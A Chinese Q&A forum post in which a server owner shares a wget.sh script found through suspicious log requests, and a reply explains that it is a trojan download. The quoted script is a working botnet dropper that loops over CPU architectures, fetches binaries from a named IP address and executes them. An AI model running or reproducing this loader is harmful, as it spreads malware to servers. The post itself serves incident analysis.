konsei 2022-10-13 14:46 采纳率: 72.2%
浏览 54

这种服务器攻击需要怎么预防吗

今天查看服务器请求日志里有几条这种记录

img


这里面的wget.sh文件下下来看是这样的代码,这意思是要删除我服务器上的文件,并把这些文件发送到他自己的服务器上吗


```bash
#!/bin/sh
u=".z"
bin_names="arm4 arm5 arm6 arm7 armv4eb armv4tl mips64 mips mipsel powerpc ppc440 m68k sh4 sparc x86_64 i686"
http_server="45.95.55.214"
for name in $bin_names
    do
    rm -rf $u
    cp $SHELL $u
    chmod 777 $u
    >$u
    wget http://$http_server/scooter/$name -O -> $u
    ./$u wget.$1.$name
done

```

  • 写回答

2条回答 默认 最新

  • xyjincan 2022-10-13 14:56
    关注

    不是的,是在黑客服务器上下载一个木马文件,然后执行

    评论

报告相同问题?

问题事件

  • 创建了问题 10月13日

悬赏问题

  • ¥20 模型在y分布之外的数据上预测能力不好如何解决
  • ¥15 processing提取音乐节奏
  • ¥15 python进程启动打包问题
  • ¥15 gg加速器加速游戏时,提示不是x86架构
  • ¥15 python按要求编写程序
  • ¥15 Python输入字符串转化为列表排序具体见图,严格按照输入
  • ¥20 XP系统在重新启动后进不去桌面,一直黑屏。
  • ¥15 opencv图像处理,需要四个处理结果图
  • ¥15 无线移动边缘计算系统中的系统模型
  • ¥15 深度学习中的画图问题